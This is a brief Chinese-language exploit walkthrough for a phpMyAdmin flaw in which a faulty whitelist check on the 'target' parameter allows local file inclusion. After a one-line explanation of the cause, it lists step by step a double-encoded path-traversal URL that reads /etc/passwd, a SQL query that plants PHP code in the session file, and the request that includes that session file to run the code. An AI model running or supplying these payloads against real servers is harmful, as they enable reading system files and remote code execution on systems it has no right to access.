漏洞原理
来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试
1.登录phpmyadmin
2.index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
3.查询<?php phpinfo();?>
4.查看sessionid(cookie中phpMyAdmin的值)
5.访问http://ip/?target=db_sql.php%253f/../../../../../../../../tmp/sess_session